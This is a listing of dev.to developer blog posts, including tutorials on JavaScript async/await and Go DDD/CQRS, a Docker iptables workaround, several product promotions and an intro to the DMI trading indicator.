This advanced use case showcases the power and flexibility of AWS Fargate when combined with other AWS services. By leveraging the serverless nature of Fargate and the scalability of Kinesis Data Streams, you can build robust and cost-effective data processing pipelines to handle the most demanding real-time data challenges.
| virajlakshitha | |
1,879,816 | OCR in .NET MAUI | Did you know that now you can scan text from an image with .NET MAUI? 🚀 We've just added OCR (Optical... | 0 | 2024-06-07T03:05:16 | https://dev.to/strypperjason/ocr-in-net-maui-2dcp | maui, dotnet | Did you know that now you can scan text from an image with .NET MAUI? 🚀 We've just added OCR (Optical Character Recognition) to our toolkit! Enhance your apps with seamless text extraction from images in our project, download or clone MAUIsland explore how it work.
1. Download: https://www.microsoft.com/store/productId/9NLQ0J5P471L?ocid=pdpshare
2. Repository: Strypper/mauisland: .NET Community (github.com)
📱💻 #dotNET #MAUI #OCR #TechUpdates #DevCommunity

| strypperjason |
1,879,025 | Explaining Async/Await in JavaScript in 10 Minutes | For a long time, we've relied on callbacks to deal with asynchronous code in JavaScript. As a... | 27,954 | 2024-06-07T03:00:00 | https://howtodevez.blogspot.com/2024/03/explaining-asyncawait-in-javascript-in.html | javascript, typescript, webdev, beginners | * For a long time, we've relied on callbacks to deal with asynchronous code in JavaScript. As a result, many of us have faced dreadful experiences dealing with deeply nested functions (**callback hell**).

* Callbacks come with a lot of drawbacks. When we have multiple asynchronous operations, callbacks have to wait for each other to execute, prolonging the completion time. Additionally, writing nested callbacks makes our code messy and hard to maintain.
* In the **ES6 (ECMAScript 2015)** version, JavaScript introduced Promises. This was a fantastic replacement for callbacks and was quickly embraced by the community. Our new code looks similar to the old one, making it easier to follow and maintain. However, the issues with callbacks weren't completely resolved.
* Since the **ES7 (ECMAScript 2016)** version, **Async/Await** has been added to make asynchronous code in JavaScript look and feel easier to use.
What is Async/Await?
--------------------
Async/Await is a feature of JavaScript that helps us handle asynchronous functions synchronously. It's built on top of Promises and is compatible with Promise. Here's how it works:
### Async - used when declaring an asynchronous function.
```ts
async function asyncFunction() {
// block code
// could be return anything (or not)
}
```
In an async function, when you return any value, it will always be a Promise.
**For example:**
* Returning a number will result in **_Promise<number>_**.
* If nothing is returned, the result will be **_Promise<void>_**.
### Await - pauses the execution of async functions.
```ts
const result = await asyncFunction() // must fulfilled to continue
// do anything else
```
* When placed before a Promise, it waits until the Promise is executed and returns the result before continuing to execute the next line of code.
* Await only works with Promises; it doesn't work with callbacks.
* Await can only be used inside async functions.
### **Example Usage**
Here, I'll provide a simple example, often used, of writing a function to make an HTTP GET call and receive JSON data. I'll implement it in two ways for you to compare between using Promise and Async/Await.
```ts
// Promise approach
function getData() {
return new Promise((resolve) => {
fetch('api endpoint').then(response => resolve(response.json()));
});
}
// Async/Await approach
async function getData() {
const response = await fetch('api endpoint');
return response.json();
}
// then use function like
const data = await getData();
console.log(data);
```
Both functions above perform the same function - they both return a Promise containing JSON data. However, you can see that when using Async/Await, the code is more concise and easier to read.
Comparing Async/Await and Promise:
----------------------------------
* In essence, when using Async/Await, we are actually interacting with Promises.
* However, Promises provide some built-in functions that allow us to manipulate multiple Promises simultaneously more easily, such as Promise.all, Promise.race, etc.
* Using Async/Await is suitable when you want to implement asynchronous code in a synchronous-looking manner for readability and understanding, suitable for sequential deployment.
**For example:**
```ts
async function sum() {
// sequentially
let value1 = await getValue1();
let value2 = await getValue2();
let value3 = await getValue3();
return value1 + value2 + value3;
}
async function sum() {
// send all requests at the same time.
const results = await Promise.all([getValue1, getValue2, getValue3]); // result is Promise array
return results.reduce((total, value) => total + value);
}
```
Error Handling
--------------
Async/Await allows us to catch unexpected errors simply by using **_try/catch/finally_** as usual. Both synchronous and asynchronous errors can be caught:
```ts
async function asyncFunction() {
try {
const result = await asyncHandle();
// handle result
} catch(error) {
console.error(error)
} finally {
// optional, always execute here
}
}
```
Another way is to use the **_catch()_** function (a built-in function of **Promise**), because async functions all return Promises, so error catching would look like this:
```ts
async function asyncFunction() {
const result = await asyncHandle();
return result;
}
asyncFunction()
.then(successHandler)
.catch(errorHandler)
.finally(finallyHandler);
```
Conclusion
----------
* Using **Async/Await** helps us implement asynchronous code in a synchronous manner, making the syntax easier to read and understand, leading to easier maintenance.
* Currently, **Async/Await** is supported on most modern browsers (except **IE11**), it's supported in **NodeJS** environment, and it's even available in **TypeScript**. So, whether you're developing on any **JavaScript** environment, you can make use of it.
**_Feel free to like and share the content if you find it helpful, and don't hesitate to leave a comment to give feedback or if you have any questions you'd like to discuss._**
**_If you found this content helpful, please visit [the original article on my blog](https://howtodevez.blogspot.com/2024/03/explaining-asyncawait-in-javascript-in.html) to support the author and explore more interesting content._**🙏
<a href="https://howtodevez.blogspot.com/2024/03/sitemap.html" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Blogger-FF5722?style=for-the-badge&logo=blogger&logoColor=white" width="36" height="36" alt="Blogspot" /></a><a href="https://dev.to/chauhoangminhnguyen" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/dev.to-0A0A0A?style=for-the-badge&logo=dev.to&logoColor=white" width="36" height="36" alt="Dev.to" /></a><a href="https://www.facebook.com/profile.php?id=61557154776384" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/Facebook-1877F2?style=for-the-badge&logo=facebook&logoColor=white" width="36" height="36" alt="Facebook" /></a><a href="https://x.com/DavidNguyenSE" target="_blank" rel="noreferrer"><img src="https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white" width="36" height="36" alt="X" /></a> | chauhoangminhnguyen |
1,879,814 | I want to get back into desktop programming - help me choose | Hi all! Every so often, I find myself missing the fun of building user interfaces and running... | 0 | 2024-06-07T02:50:11 | https://dev.to/rolandixor/i-want-to-get-back-into-desktop-programming-help-me-choose-4169 | desktop, linux, programming | Hi all!
Every so often, I find myself missing the fun of building user interfaces and running applications that I put together myself, even if just for the sake of it. It's been so long for me, that the last time I build anything meaningful on the desktop, I was running Windows XP! Since then, I've been focused on the web (front end and backend; but frontend primarily) for the most part, with some CLI programming thrown in here and there.
**_But now_**, I'd like to get back into the groove of it, as a hobby, really, but I'm undecided on what language I should pick up, and where I should put my efforts.
So I'm throwing it out to you...
## What's your favourite language + toolkit, and why?
If you're into desktop programming on Linux, what's your language + toolkit, and what makes it special for you? In the past, I've played around with interpreted languages for desktop programming, but I've always loved the speed and frankly, the "elite feeling" of compiled languages, such as C and C++.
However, I feel like we've come a long way since the days when these are our primary options (outside of Pascal and the like). So if you were getting started today, what would you choose? Rust? Vala? Something interpreted?
Feel free to share resources in the comments, too - I'd especially love to get into a language with a "noob-friendly" approach to getting started. I find that no matter how far I get in my understanding, the simpler, the better. | rolandixor |
1,879,770 | The Future of AI: Exploring AGI and ASI | Artificial Intelligence (AI) is transforming our world, with advancements like virtual assistants and... | 27,626 | 2024-06-07T01:34:00 | https://dev.to/nandha_krishnan_nk/the-future-of-ai-exploring-agi-and-asi-5aep | ai, machinelearning, deeplearning | **Artificial Intelligence** (AI) is transforming our world, with advancements like virtual assistants and autonomous vehicles becoming everyday realities. However, two emerging concepts promise to revolutionize AI further:** Artificial General Intelligence (AGI) and Artificial Superintelligence (ASI).**
**What is AGI?**
Artificial General Intelligence (AGI) is AI that can understand, learn, and apply knowledge across various tasks at a human-like level. Unlike narrow AI, which excels in specific areas (like playing chess), AGI can think, reason, and adapt to new situations.
**Key Features of AGI:**
**Versatility:** Can perform any intellectual task a human can.
**Learning:** Continuously improves from experiences.
**Autonomy:** Operates independently without human intervention.
**AGI** has the potential to revolutionize healthcare, education, and scientific research, but ensuring its safety and reliability is crucial.
**What is ASI?**
Artificial Superintelligence (ASI) surpasses human intelligence in all aspects. ASI can innovate and create beyond current human capabilities.
**Key Features of ASI:**
**Superior Intelligence:** Outperforms human minds in every field.
**Self-Improving:** Enhances its own algorithms rapidly.
**Autonomy:** Makes complex decisions independently.
**ASI** could solve global challenges and drive technological breakthroughs, but it also poses significant risks if not properly controlled. Ensuring ASI aligns with human values and ethical principles is vital.
**Conclusion:**
**AGI and ASI** represent the future of AI, offering transformative potential while posing new challenges. As we advance toward these milestones, responsible and ethical development is essential to harness their benefits and mitigate risks. The journey towards AGI and ASI will be one of the most significant endeavors of our time, shaping the future of humanity.
| nandha_krishnan_nk |
1,879,813 | Detecting Deception—The Importance of Fake ID Document Detection (ID document liveness detection) | In the current digital era, fake ID document detection is essential; confirming identities is now a... | 0 | 2024-06-07T02:43:09 | https://dev.to/faceplugin/detecting-deception-the-importance-of-fake-id-document-detection-id-document-liveness-detection-3h9d | In the current digital era, fake ID document detection is essential; confirming identities is now a vital step in preventing fraud and guaranteeing security. ID document authentication is one of the most important components of identity verification.
The prevalence of false identification documents and identity theft highlights the need for a strong mechanism to identify and stop these dangers. Fake identification and identity theft pose a severe risk to national security as well as monetary losses and reputational harm.
Identity theft and fake IDs can have detrimental effects on one’s reputation, finances, and even national security. Fraudsters produce convincing fake IDs using advanced technology, making it difficult to tell them apart from real ones. This is where the use of ID document liveness detection occurs.
FacePlugin’s novel approach checks if ID documents are authentic and unaltered by using state-of-the-art technology to identify whether they are live. Their technology analyzes the paper and confirms its legitimacy using computer vision, machine learning, and artificial intelligence.
Businesses and organizations can feel secure knowing that they are shielded from identity thieves and fraudulent IDs thanks to FacePlugin’s ID document liveness detection. Their product is a vital weapon in the battle against identity fraud because of its user-friendly, effective, and extremely precise design.
In this piece, we will take a closer look at the ID document liveness detection field and examine the advantages, workings, and use cases of FacePlugin’s approach. We will also go over the significance of verifying ID documents and the dangers of identity theft and phony IDs. By the time you finish reading this post, you will know why ID document liveness detection matters and how FacePlugin’s solution can help you keep scammers at bay.
Read full article here.
https://faceplugin.com/importance-of-fake-id-document-detection-id-document-liveness-detection/ | faceplugin | |
1,879,812 | The Basics of Big Data: What You Need to Know | Big Data has become a buzzword in the tech industry, revolutionizing how businesses operate and make... | 0 | 2024-06-07T02:37:19 | https://dev.to/bvanderbilt0033/the-basics-of-big-data-what-you-need-to-know-260e | dataprotection, dataanalytics, dataprivacy, bigdata | Big Data has become a buzzword in the tech industry, revolutionizing how businesses operate and make decisions. But what exactly is Big Data, and why is it so important? This article will break down the [basics of Big Data](https://www.rontar.com/glossary/big-data/), its significance, and how it impacts various sectors.
## What is Big Data?
Big Data refers to the massive volume of data generated every second from various sources such as social media, sensors, transactions, and more. This data is characterized by the three Vs:
**Volume:** The sheer amount of data generated is enormous, reaching petabytes and exabytes.
**Velocity:** The speed at which data is generated and processed is incredibly fast.
**Variety:** The data comes in various forms, including structured (databases), semi-structured (XML), and unstructured (text, images, videos).
## Why is Big Data Important?
**Improved Decision Making:** Big Data analytics helps businesses make informed decisions by uncovering patterns, trends, and insights from vast datasets.
**Enhanced Customer Experience:** By analyzing customer data, companies can tailor their products and services to meet customer needs, leading to higher satisfaction and loyalty.
**Operational Efficiency:** Big Data can identify inefficiencies in operations, allowing organizations to optimize processes and reduce costs.
**Innovation and New Products:** Insights from Big Data can drive innovation, leading to the development of new products and services that meet emerging market demands.
## Key Components of Big Data
**Data Sources:** Big Data comes from various sources, including social media, IoT devices, transactional systems, and more.
**Data Storage:** With the massive volume of data, traditional storage methods are inadequate. Technologies like Hadoop, NoSQL databases, and cloud storage solutions are commonly used.
**Data Processing:** Processing Big Data requires advanced technologies such as MapReduce, Apache Spark, and real-time data processing frameworks.
**Data Analysis:** Tools like machine learning, data mining, and predictive analytics are employed to extract valuable insights from Big Data.
**Data Visualization:** To make sense of complex data, visualization tools like Tableau, Power BI, and D3.js are used to create interactive and easy-to-understand visual representations.
## Big Data in Action
**Healthcare:** Big Data is used to analyze patient data for better diagnosis, treatment plans, and predicting disease outbreaks.
Finance: Financial institutions use Big Data for fraud detection, risk management, and personalized financial services.
**Retail:** Retailers analyze customer data to optimize inventory, enhance customer experience, and drive sales through targeted marketing.
**Transportation:** Big Data helps optimize routes, reduce fuel consumption, and improve overall efficiency in logistics and transportation.
**Government:** Governments use Big Data for policy-making, improving public services, and enhancing security measures.
## Challenges of Big Data
**Data Privacy and Security:** With the vast amount of data collected, ensuring privacy and security is a major concern.
**Data Quality:** Ensuring the accuracy and consistency of data is crucial for reliable analysis.
**Scalability:** Handling the ever-growing volume of data requires scalable infrastructure and solutions.
**Skilled Workforce:** There is a high demand for skilled professionals who can manage and analyze Big Data effectively.
## The Future of Big Data
The future of Big Data is promising, with advancements in artificial intelligence, machine learning, and quantum computing poised to further revolutionize the field. As technology continues to evolve, the potential applications and benefits of Big Data will expand, driving innovation and growth across industries.
## Conclusion
Big Data is more than just a trend; it's a critical component of modern business strategy and operations. Understanding the basics of Big Data, its importance, and how it's used can help individuals and organizations leverage its power to make better decisions, improve efficiency, and drive innovation. Whether you're a business leader, a data enthusiast, or someone curious about the tech world, grasping the fundamentals of Big Data is essential in today's data-driven landscape. | bvanderbilt0033 |
1,879,810 | uCool Lu Lu: Bold Decision to invest in high-impact marketing | The MVP approach enables indie game developers with limited resources to validate their game concept,... | 0 | 2024-06-07T02:31:14 | https://dev.to/ucool-lulu/ucool-lu-lu-bold-decision-to-invest-in-high-impact-marketing-3k3 | The MVP approach enables indie game developers with limited resources to validate their game concept, gather user feedback, and iteratively improve their product while minimizing risks and development costs. uCool is prime example of how this strategy can lead to the successful development and launch of engaging games that resonate with players.

## Lu Lu's bold decision to invest in high-impact marketing
Similarly, uCool, under the leadership of Lu Lu, has demonstrated the effectiveness of the MVP approach. Known for the successful mobile game Heroes Charge, uCool has managed to attract millions of players by focusing on strategic gameplay and community building. Lu Lu's bold decision to invest in high-impact marketing, such as the 2015 Super Bowl ad for Heroes Charge, showcases a commitment to bold, innovative strategies that have paid off in player engagement and retention.
## Innovative Gameplay and Community Engagement
uCool's Heroes Charge, on the other hand, features over 50 heroes and offers players the chance to engage in strategic combat and team-building activities. By focusing on balance and transparency, uCool ensures a fair and satisfying player experience, fostering a loyal and active community.
## The Role of Leadership in Game Development
Lu Lu's leadership at uCool has been characterized by a commitment to quality and a proactive approach to game development and marketing, ensuring that their games remain competitive and appealing.
By focusing on core features, testing in specific markets, and continuously iterating based on player feedback, these companies have been able to create popular games that not only entertain but also build strong, lasting communities. As the gaming industry continues to evolve, the MVP approach will remain a valuable strategy for developers seeking to innovate responsibly and bring their game ideas to life. | xx-somuch | |
1,879,809 | Penerapan Domain-Driven Design dan CQRS Pattern di Golang untuk Pemula | Apa Itu DDD (Domain-Driven Design) Arsitektur? Halo temen-temen! Jadi, Domain-Driven... | 0 | 2024-06-07T02:27:03 | https://dev.to/yogameleniawan/penerapan-domain-driven-design-dan-cqrs-pattern-di-golang-untuk-pemula-4bdl | go |

### Apa Itu DDD (Domain-Driven Design) Arsitektur?
Halo temen-temen! Jadi, Domain-Driven Design (DDD) itu sebuah pendekatan dalam pengembangan perangkat lunak yang fokus utamanya adalah pada domain bisnis yang dihadapi oleh aplikasi tersebut. Dalam DDD, kita lebih memperhatikan logika bisnis dan bagaimana cara memodelkan domain tersebut dengan cara yang mudah dipahami oleh tim pengembang dan stakeholder bisnis.
**Kenapa Harus Menggunakan DDD?**
1. Fokus pada Domain: DDD membantu kita fokus pada domain bisnis dan logika yang terkait dengan domain tersebut. Ini berarti kita memodelkan kode berdasarkan bagaimana bisnis berjalan.
2. Komunikasi Lebih Baik: DDD menggunakan bahasa yang sama dengan domain bisnis (_Ubiquitous Language_), sehingga komunikasi antara tim teknis dan stakeholder bisnis menjadi lebih efektif.
3. Struktur Kode yang Jelas: Dengan DDD, kode kita terstruktur berdasarkan domain dan subdomain. Ini membuat kode lebih mudah dipahami dan di-maintain.
4. Skalabilitas: DDD mendukung modularitas dan skalabilitas. Ketika bisnis berkembang, aplikasi juga bisa berkembang tanpa perlu perubahan besar-besaran.
### Apa Itu CQRS (Command Query Responsibility Segregation) Pattern?
CQRS adalah pola desain yang memisahkan operasi baca (query) dan tulis (command) dalam aplikasi. Jadi, daripada menggabungkan operasi baca dan tulis dalam satu model, kita memisahkannya menjadi dua model yang berbeda. Hal ini memungkinkan kita untuk mengoptimalkan dan menskalakan masing-masing operasi secara independen.
**Kenapa Pakai CQRS Pattern?**
1. Optimalisasi Kinerja: Dengan memisahkan operasi _read_ dan _write_, kita bisa mengoptimalkan masing-masing operasi sesuai kebutuhan. Misalnya, kita bisa menggunakan caching untuk operasi _read_ tanpa mempengaruhi operasi _write_.
2. Skalabilitas: CQRS memungkinkan aplikasi untuk diskalakan secara independen antara bagian yang menangani query dan command. Ini sangat berguna ketika aplikasi mulai tumbuh besar dan beban kerja meningkat.
3. Simplifikasi Model Data: Memisahkan model data untuk _read_ dan _write_ dapat menyederhanakan desain database. Model query bisa dioptimalkan untuk performa _read_, sementara model command bisa dioptimalkan untuk _read_ dan _transaction_.
4. Isolasi Logika Bisnis: CQRS membantu dalam memisahkan logika bisnis dari logika presentasi dan data, sehingga membuat kode lebih bersih dan mudah di-maintain.
Untuk artikel lengkapnya temen-temen bisa buka artikel tentang [CQRS disini ya](https://yogameleniawan.com/learning-media/memahami-cqrs-command-query-responsibility-segregation-kenapa-dan-bagaimana-menggunakannya-4hmf)
### Contoh Implementasi DDD dan CQRS di Golang
**Struktur Folder dan File**
```bash
/project
/cmd
/app
main.go
/internal
/domain
/product
product.go
/infrastructure
/db
db.go
/http
http.go
/application
/product
/commands
create_product.go
/queries
get_product.go
/interfaces
/http
product_handler.go
```
**Entity (Product)**
```go
// internal/domain/product/product.go
package product
type Product struct {
ID string
Name string
Price float64
}
```
**Infrastructure (Database)**
```go
// internal/infrastructure/db/db.go
package db
import (
"database/sql"
"fmt"
_ "github.com/mattn/go-sqlite3"
)
func NewSQLiteDB(dataSourceName string) (*sql.DB, error) {
db, err := sql.Open("sqlite3", dataSourceName)
if err != nil {
return nil, err
}
if err := db.Ping(); err != nil {
return nil, err
}
fmt.Println("Connected to the database successfully!")
return db, nil
}
```
**Commands (CreateProduct)**
```go
// internal/application/product/commands/create_product.go
package commands
import (
"context"
"github.com/yogameleniawan/ddd_project/internal/domain/product"
)
type CreateProductCommand struct {
Name string
Price float64
}
type CreateProductHandler struct {
repo product.Repository
}
func NewCreateProductHandler(repo product.Repository) *CreateProductHandler {
return &CreateProductHandler{repo}
}
func (h *CreateProductHandler) Handle(ctx context.Context, cmd CreateProductCommand) (product.Product, error) {
p := product.Product{
ID: generateID(), // Bisa pakai UUID
Name: cmd.Name,
Price: cmd.Price,
}
err := h.repo.Save(p)
if err != nil {
return product.Product{}, err
}
return p, nil
}
```
**Queries (GetProduct)**
```go
// internal/application/product/queries/get_product.go
package queries
import (
"context"
"github.com/yogameleniawan/ddd_project/internal/domain/product"
)
type GetProductQuery struct {
ID string
}
type GetProductHandler struct {
repo product.Repository
}
func NewGetProductHandler(repo product.Repository) *GetProductHandler {
return &GetProductHandler{repo}
}
func (h *GetProductHandler) Handle(ctx context.Context, query GetProductQuery) (product.Product, error) {
return h.repo.FindByID(query.ID)
}
```
**Repository (Data Access)**
```go
// internal/domain/product/repository.go
package product
type Repository interface {
Save(product Product) error
FindByID(id string) (Product, error)
}
type sqliteRepository struct {
db *sql.DB
}
func NewSQLiteRepository(db *sql.DB) Repository {
return &sqliteRepository{db}
}
func (r *sqliteRepository) Save(product Product) error {
_, err := r.db.Exec("INSERT INTO products (id, name, price) VALUES (?, ?, ?)", product.ID, product.Name, product.Price)
return err
}
func (r *sqliteRepository) FindByID(id string) (Product, error) {
row := r.db.QueryRow("SELECT id, name, price FROM products WHERE id = ?", id)
var product Product
err := row.Scan(&product.ID, &product.Name, &product.Price)
if err != nil {
return Product{}, err
}
return product, nil
}
```
**Interface (HTTP Handler)**
```go
// internal/interfaces/http/product_handler.go
package http
import (
"encoding/json"
"net/http"
"github.com/yogameleniawan/ddd_project/internal/application/product/commands"
"github.com/yogameleniawan/ddd_project/internal/application/product/queries"
)
type ProductHandler struct {
createHandler *commands.CreateProductHandler
getHandler *queries.GetProductHandler
}
func NewProductHandler(createHandler *commands.CreateProductHandler, getHandler *queries.GetProductHandler) *ProductHandler {
return &ProductHandler{createHandler, getHandler}
}
func (h *ProductHandler) CreateProduct(w http.ResponseWriter, r *http.Request) {
var req struct {
Name string `json:"name"`
Price float64 `json:"price"`
}
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
return
}
cmd := commands.CreateProductCommand{
Name: req.Name,
Price: req.Price,
}
product, err := h.createHandler.Handle(r.Context(), cmd)
if (err != nil) {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(product)
}
func (h *ProductHandler) GetProduct(w http.ResponseWriter, r *http.Request) {
id := r.URL.Query().Get("id")
query := queries.GetProductQuery{
ID: id,
}
product, err := h.getHandler.Handle(r.Context(), query)
if (err != nil) {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(product)
}
```
**Entry Point (main.go)**
```go
// cmd/app/main.go
package main
import (
"log"
"net/http"
"github.com/yogameleniawan/ddd_project/internal/infrastructure/db"
"github.com/yogameleniawan/ddd_project/internal/domain/product"
"github.com/yogameleniawan/ddd_project/internal/application/product/commands"
"github.com/yogameleniawan/ddd_project/internal/application/product/queries"
"github.com/yogameleniawan/ddd_project/internal/interfaces/http"
)
func main() {
dbConn, err := db.NewSQLiteDB("file:products.db?cache=shared&mode=memory")
if err != nil {
log.Fatalf("could not connect to the database: %v", err)
}
productRepo := product.NewSQLiteRepository(dbConn)
createProductHandler := commands.NewCreateProductHandler(productRepo)
getProductHandler := queries.NewGetProductHandler(productRepo)
productHandler := http.NewProductHandler(createProductHandler, getProductHandler)
http.HandleFunc("/products", productHandler.CreateProduct)
http.HandleFunc("/product", productHandler.GetProduct)
log.Fatal(http.ListenAndServe(":8080", nil))
}
```
**Penjelasan**
- **Entity**: Define `Product` dengan atribut `ID`, `Name`, dan `Price`.
- Infrastructure: Contoh koneksi ke SQLite database.
- **Commands**: `CreateProductCommand` dan `CreateProductHandler` untuk handle operasi tulis.
- **Queries**: `GetProductQuery` dan `GetProductHandler` untuk handle operasi _read_.
- **Repository**: Implementasi repository untuk data access.
- HTTP Handler: Handler untuk HTTP request yang meng-handle operasi _read_ dan _write_.
- **Main**: Entry point aplikasi, menyambungkan semua komponen dan menjalankan HTTP server.
Dengan CQRS, kita bisa misahin logika baca dan tulis sehingga performa aplikasi lebih optimal dan kode lebih terstruktur. Semoga penjelasan ini membantu, bro! Happy coding! Jangan lupa ngoding itu diketik jangan dipikir, sampai bertemu di artikel lainnya bro!
| yogameleniawan |
1,879,777 | dockerd & 실행 시 iptables not found 오류 | rocky linux 8.10에서 dockerd & Enter fullscreen mode Exit fullscreen mode ... | 0 | 2024-06-07T02:01:22 | https://dev.to/__aa3e4bc832ba7032bfa3/dockerd-silhaeng-si-iptables-not-found-oryu-2ja8 | docker, iptables | rocky linux 8.10에서
```shell
dockerd &
```
실행 시
```
failed to start daemon: Error initializing network controller: error obtaining controller instance: failed to register "bridge" driver: failed to create NAT chain DOCKER: iptables not found
```
같은 에러가 뜨면
```shell
dockerd --iptables=false &
```
로 실행하면 된다.
**근데 이러면 나중에 문제가 생기니 dnf로 iptable 관련 프로그램을 설치하는게 낫다. ** | __aa3e4bc832ba7032bfa3 |
1,879,805 | Approving My New Developer Portfolio | Lately, I've been immersed in crafting my new portfolio, aiming for a perfect blend of sophistication... | 0 | 2024-06-07T02:25:08 | https://dev.to/kiraaziz/approving-my-new-developer-portfolio-1p4g | webdev, javascript, beginners, programming | Lately, I've been immersed in crafting my new portfolio, aiming for a perfect blend of sophistication and creativity.
Inspired by classical art and infused with captivating animations, it's been a labor of love to refine it to its current state.
You can check it out here:[https://coolkira.vercel.app]( https://coolkira.vercel.app).
You're invited to explore the results here. I'd love to hear your thoughts! | kiraaziz |
1,879,808 | Under the Hood: How a Revolutionary Platform Propelled the 2024 NFL Draft to Stratospheric Heights | Alright, tech fiends, strap in because we're about to embark on one wild ride! As someone who's... | 0 | 2024-06-07T02:24:26 | https://dev.to/kevintse756/under-the-hood-how-a-revolutionary-platform-propelled-the-2024-nfl-draft-to-stratospheric-heights-21k6 |
Alright, tech fiends, strap in because we're about to embark on one wild ride! As someone who's always on the bleeding edge of media tech innovation, I was utterly spellbound by the sheer production wizardry that went down at the recent [NFL Draft 2024](https://www.sportsvideo.org/2024/04/25/nfl-draft-2024-nfl-network-embraces-motown-groove-with-massive-production-that-goes-beyond-detroit/). Whispers on the grapevine suggest that the NFL Network pulled out all the stops, unleashing a game-changing solution called TVU MediaHub to make this epic extravaganza a reality (peep it [here](https://www.linkedin.com/posts/tvu-networks_nfl-draft-2024-nfl-network-embraces-motown-activity-7189650786803445760-3dRd/?utm_source=share&utm_medium=member_desktop) if you're curious).
Needless to say, my curiosity was piqued to the max, and I just had to dive deep into this platform that seems destined to shake up the broadcasting game like never before.
Propelling Live Production to Unprecedented Heights
At its core, TVU MediaHub is a cloud-based beast designed to tackle the ever-growing complexities of modern broadcasting head-on. Here are a few standout features that caught my eye:
- Scalability on Steroids: This bad boy can handle an insane array of video inputs and outputs across various formats, from SDI and NDI to RTMP and SRT. We're talking flexibility on a whole new level, folks!
- Real-Time Sorcery: Harnessing the power of cutting-edge AI and algorithmic witchcraft, TVU MediaHub delivers lightning-fast video and audio processing with minimal latency – a live broadcaster's dream come true, no doubt.
- Dynamic Resource Kung-Fu: Built on a microservice architecture with a mind-boggling 140 microservices (yes, you read that right), this platform optimizes resource allocation on the fly, ensuring top-notch performance and cost-efficiency.
Collectively, these features are smashing through the boundaries of what's possible in media distribution and broadcasting, promising a seamless, high-quality experience for viewers like never before.

The NFL Draft 2024: A Case Study in Excellence
The NFL Network's use of [TVU](https://www.tvunetworks.com/) MediaHub during the recently concluded NFL Draft 2024 serves as a prime example of this platform's capabilities in action. In a production of this magnitude, efficiency and reliability are non-negotiable, plain and simple.
- Signal Symphony: TVU MediaHub deftly managed high-definition audio and video signals from multiple sources, ensuring synchronized, high-quality broadcasts across various platforms, including social media and OTT services.
- Real-Time Mastery: With its real-time content management prowess, the platform minimized latency, ensuring that live interviews and feeds were broadcast without a hitch. This level of performance is crucial for maintaining that immersive viewer experience during live events.
The resounding success of the NFL Draft 2024 underscores TVU MediaHub's ability to handle complex live productions with ease, making it an invaluable asset for broadcasters.
Outshining the Competition, One Groundbreaking Innovation at a Time
But what truly sets TVU MediaHub apart from its rivals? Here are a few key factors that give it an edge:
- AI-Powered Precision: The platform's use of AI for real-time video processing, including encoding and frame rate conversion, ensures top-notch performance with minimal human intervention.
- Redundancy and Reliability Reign Supreme: Its unique distribution mechanism, combined with path redundancy, ensures uninterrupted service, even in the face of network challenges. This reliability factor is a significant advantage over competitors who may not offer the same level of redundancy and real-time processing capabilities.
- Real-Time Collaboration on Point: TVU MediaHub supports real-time collaboration, with features like integrated multi-viewers and metering. This sets it apart in its ability to facilitate collaborative live production environments.
These technical advantages highlight TVU MediaHub's superiority in the market, offering broadcasters a versatile and reliable tool for live production and media distribution.
Industry Recognition and Future Potential
Industry Accolades
TVU MediaHub's innovative contributions haven't gone unnoticed. At NAB 2024, it was awarded the coveted Product of the Year Award for its advanced routing capabilities and impact on content distribution. Similarly, at CABSAT 2024, the platform was celebrated for its role in driving broadcast innovation.
- NAB 2024 Award: This recognition at NAB 2024 underscores the platform's significant impact on the industry, showcasing its advanced features that are pushing the boundaries of what's possible in media production ([NAB Show Announces Winners of 2024 Product of the Year Awards](https://www.nab.org/documents/newsRoom/pressRelease.asp?id=6975)).
- CABSAT 2024 Accolades: At CABSAT 2024, TVU MediaHub was lauded for its transformative role in live production workflows, further cementing its status as a leader in the field ([LinkedIn Post on CABSAT 2024](https://www.linkedin.com/posts/tvu-networks_tvunetworks-cabsat2024-broadcastinnovation-activity-7199118338776588288-QAmL)).
User Feedback
But it's not just industry experts singing TVU MediaHub's praises. Feedback from users has been overwhelmingly positive, with broadcasters lauding the platform for its user-friendly interface, exceptional performance, and cost-effectiveness. The platform's success during the NFL Draft 2024 has particularly highlighted its reliability and efficiency in large-scale live events.
Future Prospects
Looking ahead, TVU MediaHub is poised to drive further innovations in media production and distribution:
- AI Capabilities on Steroids: Future developments are likely to see even more sophisticated AI features for automated video processing and enhanced operational efficiency.
- Integration with Emerging Tech: The platform's potential integration with 5G and edge computing promises even greater real-time capabilities, making it indispensable for next-generation media production.
- Applications Galore: From live sports to news broadcasting and entertainment, TVU MediaHub's application scenarios are vast. Its ability to deliver low-latency, high-quality content will revolutionize production workflows across various domains.
In the ever-evolving media landscape, TVU MediaHub represents a significant leap forward in technology. Its application in the NFL Draft 2024 and subsequent industry recognition underscore its transformative potential. As the world of broadcasting continues to evolve, TVU MediaHub is set to lead the charge, setting new standards for live production and content distribution. | kevintse756 | |
1,879,806 | Calculation and application of DMI indicators | Introduction to DMI indicators The DMI indicator is also called the momentum indicator or... | 0 | 2024-06-07T02:22:11 | https://dev.to/fmzquant/calculation-and-application-of-dmi-indicators-2k0k | indicators, trading, cryptocurrency, fmzquant | ## Introduction to DMI indicators
The DMI indicator is also called the momentum indicator or the trend indicator, the full name is “Directional Movement Index (DMI)”. It was created by American technical analysis guru Wells Wilder, it's a medium and long-term market technical analysis method.
The DMI indicator is a change in the equilibrium point of the buyers and sellers in the process of rising and falling of prices, that is to say, the change of the strength of both the long and the short sides is affected by the price fluctuations, and the cyclical process from equilibrium to imbalance occurs, thus providing a technical indicator for judging the trend.
## Indicator calculation
Recently, a number of friends in the quantitative trading business have consulted me about how to use the DMI indicator on the FMZ Quant quantitative trading platform. I thought it was a very simple problem, and I opened the API documentation to find this indicator function. Found that this indicator is not available in the "versatile" talib indicator library. after some googling, I found some information.
It is found that this indicator is composed of four indicators. The algorithm is not very complicated. Simply follow the algorithm will be fine.
